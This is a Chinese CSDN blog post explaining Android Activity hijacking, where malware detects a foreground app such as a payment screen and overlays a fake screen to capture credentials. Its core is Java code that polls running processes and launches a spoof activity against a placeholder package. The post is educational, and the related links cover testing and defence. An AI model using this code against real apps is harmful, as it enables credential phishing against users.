劫持Activity

最新推荐文章于 2021-08-25 19:02:56 发布
最新推荐文章于 2021-08-25 19:02:56 发布
阅读量1.4k 收藏 2
点赞数
分类专栏: android 文章标签: 劫持Activity
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jackzhouyu/article/details/50134905
版权
Activity劫持概念:
我们登陆正常的APP界面时,被恶意程序监听到,模仿正常界面启动我们的Activity;例如我们支付界面被劫持后,恶意软件启动自己的Activity来模仿支付界面,诱使你输入账号和密码;从而达到劫持效果


劫持核心代码原理:
1. 读取当前运行的app进程,判断在前端显示并且其他属性,得到劫持的app后启动自己模仿的activity即可
2. 定周期的执行该任务,扫描运行程序列表 

	
	mTimer = new Timer();
	mTimer.schedule(tTask, 3000, 3000);				//每隔3秒执行一次任务
	
	/**
	 * Activity劫持定时监控
	 * 每隔一定时间去搜索手机屏幕上运行的程序
	 */
	private TimerTask tTask = new TimerTask() {
		
		@Override
		public void run() {
			// TODO Auto-generated method stub
			
			ActivityManager am = (ActivityManager) getSystemService(Context.ACTIVITY_SERVICE);
			
			List<RunningAppProcessInfo> info = am.getRunningAppProcesses();					//得到运行app进程
			Log.i(TAG, "running process size " + info.size() +" "+ Process.myPid());
			//枚举进程
			for(RunningAppProcessInfo rInfo : info){
				
				String processName = rInfo.processName;
				
				Log.i(TAG, "processName " + processName);
				//判断前台进程
				if(rInfo.importance == RunningAppProcessInfo.IMPORTANCE_FOREGROUND && processName.contains("com.example.testactivity")){
					Log.i(TAG, "running processName " + rInfo.processName + " pid " + rInfo.pid + " importace " + 
														rInfo.importance + " importanceReasonCode " + rInfo.importanceReasonCode + 
														" importanceReasonPid " + rInfo.importanceReasonPid
														+ " lru " + rInfo.lru + " importanceReasonComponent " + rInfo.importanceReasonComponent + 
														" pkgList " + rInfo.pkgList);
					if(mTimer != null){
						Log.i(TAG, "mTimer.cancel");
						mTimer.cancel();
						mTimer = null;
					}
					Intent intent = new Intent(getBaseContext(),MainActivity.class);
					intent.putExtra("processName", rInfo.processName);
					intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
					getApplication().startActivity(intent);
				}
			}
			
		}
	};


帅气好男人_Jack
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
android程序劫持持程序,安卓activity劫持测试工具开发
weixin_32446485的博客
05-26 998
一、前言在日常对Android apk安全测试过程中,有一个测试用例是界面劫持(activity劫持,安卓应用的界面是一层一层的,后启动的应用会在栈顶,显示在最前面),就是恶意apk可以不停枚举进程是否存在要劫持的目标进程。如果发现了目标进程,就将自己的欺骗页面启动;如果目标apk未对界面劫持进行反劫持检测,那么用户就会受到欺骗攻击;如果一个恶意应用在用户启动银行app时,启动自身界面,模拟成银行...
Android安全风险与防范措施--Activity劫持
weixin_56945835的博客
04-14 1661
Activity劫持风险与防范措施 在Android系统问世不久,曾发生过这样的事情,用户在正常输入用户名、密码的情况,账密信息缺被盗的情况,why? 我们在使用银行类app时,只要我们的银行app客户端退至后台,为啥总会提示一下我们,“***已退至后台”的字样,why? 今天我们就一起来聊聊 activity劫持的那些事。 Activity是我们构建app应用的基本页面,而android app activity页面的管理,是通过栈 来管理的。而在activity 启动时,“FLAG_ACTIVITY_
activity劫持学习与复现
九天
04-14 4539
前言 activity劫持是指当程序运行时,恶意程序检测到前台运行的正是想要劫持的程序,于是立即启动自己的活动,伪造一个一模一样的登录界面并立马呈现给用户,普通用户无法识别这个页面的真实性,于是恶意程序就可以获取到用户输入的敏感信息并上传到自己的服务器。 activity劫持原理 1、在启动activity的时候,加入标志位FLAG_ACTIVITY_NEW_TA
Android之Activity界面劫持劫持
Shine_on_the_earth的博客
09-18 3187
总结: Activity劫持原理 1、注册一个receiver,响应android.intent.action.BOOT_COMPLETED,使得开机启动一个service;这个service,会启动一个计时器,不停循环查询所有当前运行的进程(因为app可以枚举系统当前运行进程而无需声明其他权限) 2、一旦发现当前某一进程正是我们想要劫持的,并运行在前台,我们立马使用FLAG_ACTIVITY_...
安卓activity劫持
ONS_cukuyo的博客
12-19 1912
  安卓activity劫持演示demo,包含指定activity位于前台时的劫持和指定进程位于前台时的劫持 参考:https://blog.csdn.net/LVXIANGAN/article/details/79299005 根据上面的参考博客写了这个,增加了劫持指定activactivity的功能以及停止的功能 Github 进程位于前台时   当指定activity位于前...
Android安全检查之Activity劫持检测
小马总的博客
04-26 2808
处理检测app进去后台的时候提示用户 也就是在onPause的时候 /** * Is foreground boolean. * * @param context the context * @return the boolean */ /*判断应用是否在前台*/ public static boolean isForegrou...
Android Activity劫持方案
黄小梁的博客
08-25 4628
最近,安全合规部门又对金融类、银行类app进行了大规模的多方面安全检查,其中有一项安全问题:Activity劫持。其实Android界面防劫持我们app这边也是做了的,但是为啥还会有这些问题呢?自我感觉就是绝不会有此类问题,于是我们向检测部门要了劫持工具,但是事实往往是打脸的。。。。。 那么什么是Activity劫持呢?简单的说就是我们APP正常的Activity界面被恶意攻替换上仿冒的恶意Activity界面进行攻击和非法用途。界面劫持攻击通常难被识别出来,其造成的后果必然会给用户带来严重损失。 举个例.
Android之Activity劫持实例与防护手段
lizhong
12-02 2422
一、什么叫Activity劫持 这里举一个例子。用户打开安卓手机上的某一应用,进入到登陆页面,这时,恶意软件侦测到用户的这一动作,立即弹出一个与该应用 界面相同的Activity,覆盖掉了合法的Activity,用户几乎无法察觉,该用户接下来输入用户名和密码的操作其实是在恶意软件的Activity上进行的,接下来会发生什么就可想而知了。 二、实例 Activity劫持的危害是非常大的...
activity劫持劫持
RuiMan的博客
04-13 4408
1、Activity调度机制 android为了提高用户的用户体验,对于不同的应用程序之间的切换,基本上是无缝。他们切换的只是一个activity,让切换的到前台显示,另一个应用则被覆盖到后台,不可见。Activity的概念相当于一个与用户交互的界面。而Activity的调度是交由Android系统中的AmS管理的。AmS即ActivityManagerService(Activity管理服
activity劫持
03-04
Activity劫持】是一种Android应用安全问题,主要发生在Android系统的应用程序中。Activity是Android四大组件之一,用于构建用户界面并处理用户交互。当一个Activity劫持,攻击者可以恶意篡改其行为,例如在用户...
Activity_Hijack.apk
04-19
使用方法:安装HijackActivity.apk,使用 activity 界面劫持工具,在工具中指定要劫持的应用进程名称。如图所示,从列表中选择被测试的应用,点击 OK。打开应用,测试工具会尝试用自己的窗口覆盖被测的应用,如果...
Android Hook Activity 启动劫持
02-27
`Android Hook Activity 启动劫持`是一种高级技术,它允许开发者利用动态代理(Dynamic Proxy)技术来拦截并控制AMS的行为,从而在不修改系统源码的情况下,实现对Activity启动流程的监控或修改。 首先,我们需要...
sdk开发项目心得
热门推荐
jackzhouyu的专栏
09-12 1万+
这是博主第一次sdk开发工作,是开发过程中的感悟和心得,写得不好,还请指正公司背景是一家专门从事sdk开发服务的公司,这次楼主接到sdk开发的任务,项目经理告知说可以依靠之前公司的sdk进行修修改改就可以完成任务,楼主就这么做了,可是做到后期项目需求变化发现公司之前的sdk根本不能用了,但是项目也进行了一大半,所有就在之前的代码框架下完成,到项目后期功能全部完成后,才发现有大问题; sdk框架前期
关于Charles抓HTTPS包以及乱码问题解决
jackzhouyu的专栏
02-22 6102
HTTPS包原理解析 HTTPS包之所以比HTTP安全是因为HTTP包经过秘钥加密,这个秘钥是HTTP建立握手阶段由客户端与服务端协商分配的,如果这个握手阶段需要进行证书验证,则无论如何你用一些抓包工具是抓不到HTTPS包的;但是现阶段很多移动App没有进行HTTPS证书验证,那这就好办了; 抓包工具在与服务端连接时,把自己伪装成一个客户端,而在和客户端连接时,伪装成一个服务端,他在中间知道秘钥就...
扇形图-可视化数据
jackzhouyu的专栏
04-01 5357
可视化数据图 - 自定义扇形饼状图如觉得文字版本不适合阅读,请点击这里组件特性 根据传入的四种数据量大小自动显示扇形的弧度大小以及弧度半径大小 根据弧度所在的角度自动画出横线和斜线位置并显示状态 效果图实现原理 将圆弧和线拆分来看,先画圆弧,再画线 弧度的画法,利用sdk的new Recf(start_x, start_y, end_x, end_y)来限定幅度半径,在用canvas.drawArc
android studio设置指定的签名文件
jackzhouyu的专栏
03-11 4896
不废话,直接看怎么弄,下面两张图你就指定啦配置签名文件和密码(前提你已经有自己的签名文件keystore或者jks)将上面的签名配置设置到你的Build Types去这一步已经完成啦,写完代码构建生成的app就是使用的我们设置的keystore了看一下配置后我们的Build.gradle发生什么变化看到这里是不是懂了,我就不再多言啦
android 彻底杀死进程
jackzhouyu的专栏
01-22 4845
http://263229365.iteye.com/blog/1283914
Retrofit的Cookie操作方案
jackzhouyu的专栏
03-09 3822
Cookie简介 Cookie一般用于后台和客户端数据访问的有效保证,由服务端创建,客户端保存,客户端访问时将Cookie保存在请求数据header里面,服务端收到访问请求后,解析出header的库,对本次请求进行有效的验证 Retrofit + Cookie 移动端网络库一般都是用Retrofit库,Retrofit是对Okhttp的一次很完美的封装,并且可以自定义Okhttp,我们这里使...
使用Frida检测App是否有Activity组件劫持风险
最新发布
06-07
Frida是一款常用的应用程序动态分析工具,可以在运行时对应用程序进行监控和修改。以下是使用Frida检测应用程序中Activity组件劫持风险的步骤: 1. 下载并安装Frida,启动Frida服务; 2. 在命令行中输入以下命令,启动需要动态分析的应用程序: ``` frida -U -f com.example.app --no-pause -l script.js ``` 其中,com.example.app为需要分析的应用程序包名,script.js为自定义的Frida脚本文件。 3. 在script.js中编写检测Activity组件劫持的代码: ``` Java.perform(function() { var Activity = Java.use("android.app.Activity"); Activity.startActivity.implementation = function(intent) { console.log("startActivity: " + intent); this.startActivity(intent); }; }); ``` 以上脚本将对所有Activity组件的startActivity()方法进行拦截,在方法执行前打印Intent信息,以检测Activity组件是否被劫持。 4. 在命令行中按Ctrl+C结束Frida的运行。检测结果将输出在命令行中。 需要注意的是,Frida是一款强大的动态分析工具,可以对应用程序进行监控和修改,但也可能被攻击者用于攻击应用程序。因此,在使用Frida进行安全测试时,需要遵循合法合规的原则,避免侵犯用户隐私和数据安全。同时,建议使用最新版本的Frida,并结合其他静态分析工具和动态分析工具进行综合测试,以提高测试的准确性和全面性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

帅气好男人_Jack

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值